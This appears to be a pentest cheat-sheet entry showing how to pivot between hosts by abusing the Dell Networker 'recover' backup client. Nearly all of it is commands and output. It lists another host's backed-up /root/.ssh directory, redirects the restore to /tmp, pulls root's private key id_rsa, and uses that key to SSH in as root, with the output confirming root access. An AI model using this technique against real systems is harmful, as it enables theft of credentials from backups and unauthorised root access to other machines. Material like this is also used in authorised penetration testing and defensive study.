Dell Networker
Pivot with Recover
## Enum backup and look for secrets
[root@victimHost ~] recover -c anotherVictimHost
recover> ls -al /root/.ssh
total 28
-rw------- 500 409 Jan 16 2019 authorized_keys
-rw-r--r-- 500 2090 Feb 05 2019 config
-rw------- 500 1675 Jan 16 2019 id_rsa
-rw-r--r-- 500 409 Jan 16 2019 id_rsa.pub
-rw-r--r-- 500 8291 Feb 08 2019 known_hosts
## Change save destination
recover> destination
recover files into their original location
recover> relocate
New destination directory: /tmp
recover> destination
recover files into /tmp
## Restore/download id_rsa
recover> add id_rsa
1 file(s) marked for recovery
recover> recover
Recovering 1 file from /root/.ssh/ into /tmp
...
Recover completion time: Mon 26 Jun 2023 02:24:41 PM CEST
recover> exit
[root@victimHost ~]# ls -al /tmp/
total 12
drwxrwxrwt. 14 root root 4096 Jun 26 14:24 .
dr-xr-xr-x. 23 root root 4096 Jun 26 09:02 ..
...
-rw------- 1 500 users 1675 Jan 16 2019 id_rsa
## Pivot with recovered id_rsa
[root@victimHost tmp]# ssh root@anotherVictimHost -i id_rsa
[root@anotherVictimHost ~]$ id && hostname
uid=0(root) gid=0(root) groups=0(root)
anotherVictimHostLast updated